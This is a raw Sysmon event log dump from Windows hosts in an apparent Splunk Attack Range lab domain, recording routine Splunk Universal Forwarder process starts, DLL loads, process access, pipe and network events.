734700x800000000000000057345544Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057345543Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057345542Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 734700x800000000000000057345541Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057345540Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057345539Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057345538Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 10341000x800000000000000057345537Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057345536Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057345535Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057345534Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057345533Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exeMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2trueSplunk, Inc.Valid 10341000x800000000000000057345532Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-8868-6164-0500-00000000F101}424548C:\Windows\system32\csrss.exe{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057345531Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.379{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057345530Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.364{8B6011A9-5B46-618E-43F3-04000000F101}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000057345529Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:10.363{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057345528Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:17:10.363{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057345527Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:10.363{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057345526Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:17:10.363{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057345525Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:10.363{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057345524Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:17:10.363{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 534500x800000000000000057345523Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.115{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe 734700x800000000000000057345522Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.113{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 10341000x800000000000000057345521Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.111{8B6011A9-5B45-618E-42F3-04000000F101}86647328C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057345520Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.101{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057345519Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.100{8B6011A9-5B45-618E-42F3-04000000F101}8664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 10341000x800000000000000021219632Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:11.931{AD5E2759-5B47-618E-0ECE-08000000F101}1320756C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021219631Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:11.759{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C638EFE23DAF9AFF31537B2457D82C7,SHA256=FA848B5EE03F7F213C9B878FFAB73DBED5AD4771C96FA376663229237FE5EFC1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219630Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:11.759{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=608B2B94F5BE48F8A546BF3E677C28E3,SHA256=EAB7B446D7CDD171D8EDEBCDC8D3F01AB8A1F5A9E1F4A350EF3541C596349ED2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000021219629Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:11.744{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5B47-618E-0ECE-08000000F101}1320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219628Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:11.744{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219627Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:11.744{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219626Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:11.744{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219625Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:11.744{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219624Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:11.744{AD5E2759-5432-6143-0500-00000000F101}4122832C:\Windows\system32\csrss.exe{AD5E2759-5B47-618E-0ECE-08000000F101}1320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219623Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:11.744{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5B47-618E-0ECE-08000000F101}1320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219622Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:11.729{AD5E2759-5B47-618E-0ECE-08000000F101}1320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000021219621Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:57.493{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64322-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219620Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:11.103{AD5E2759-54C7-6143-A600-00000000F101}4072NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=191BF671B22BB6D0D8098F4764225CD4,SHA256=587F0439BC6F77A0432866DC98383BB4980C713A6CBE1D9A500FD8BFA4A6C98D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000021219619Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:11.056{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5B47-618E-0DCE-08000000F101}5752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219618Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:11.056{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219617Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:11.056{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219616Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 